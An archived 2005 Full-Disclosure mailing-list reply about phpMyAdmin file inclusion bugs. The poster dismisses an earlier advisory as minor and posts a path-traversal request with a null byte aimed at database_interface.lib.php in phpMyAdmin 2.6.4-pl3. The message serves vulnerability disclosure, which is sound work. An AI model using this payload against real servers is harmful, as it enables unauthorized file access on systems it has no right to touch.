[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Re: Advisory 16/2005: phpMyAdmin Local File Inclusion Vulnerability (Stefan Esser)

To: full-disclosure@xxxxxxxxxxxxxxxxx, sesser@xxxxxxxxxxxxxxxx
Subject: [Full-disclosure] Re: Advisory 16/2005: phpMyAdmin Local File Inclusion Vulnerability (Stefan Esser)
From: Maksymilian Arciemowicz <max@xxxxxxxxxxxx>
Date: Sun, 23 Oct 2005 20:00:37 +0200

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

It is low local file inclusion. No critical. Standart have you 
$cfg['ThemePath'].
More critical bug still exists in phpmyadmin. 

phpMyAdmin-2.6.4-pl3/libraries/database_interface.lib.php?cfg[Server]
[extension]=../../mGPC_muss_be_off_%00

org. adv.
http://securityreason.com/achievement_securityalert/1

Maksymilian Arciemowicz max@xxxxxxxxxxxx
SecurityReason.Com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (FreeBSD)

iD8DBQFDW8673Ke13X/fTO4RAsbzAKCv8tkGfD5dAbliWlaLMkfLkYnVfgCgs9RE
HllDGmvD6iOQiSeH9Sk4WCQ=
=9U2v
-----END PGP SIGNATURE-----
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Follow-Ups:
- [Full-disclosure] Re: Advisory 16/2005: phpMyAdmin Local File Inclusion Vulnerability (Stefan Esser)
  - From: Stefan Esser

Prev by Date: Re: [Full-disclosure] annoying bug in Windows XP
Next by Date: [Full-disclosure] Re: Advisory 16/2005: phpMyAdmin Local File Inclusion Vulnerability (Stefan Esser)
Previous by thread: [Full-disclosure] Vulnerability in AL-Caricatier, V.2.5 And Prior Versions
Next by thread: [Full-disclosure] Re: Advisory 16/2005: phpMyAdmin Local File Inclusion Vulnerability (Stefan Esser)
Index(es):
- Date
- Thread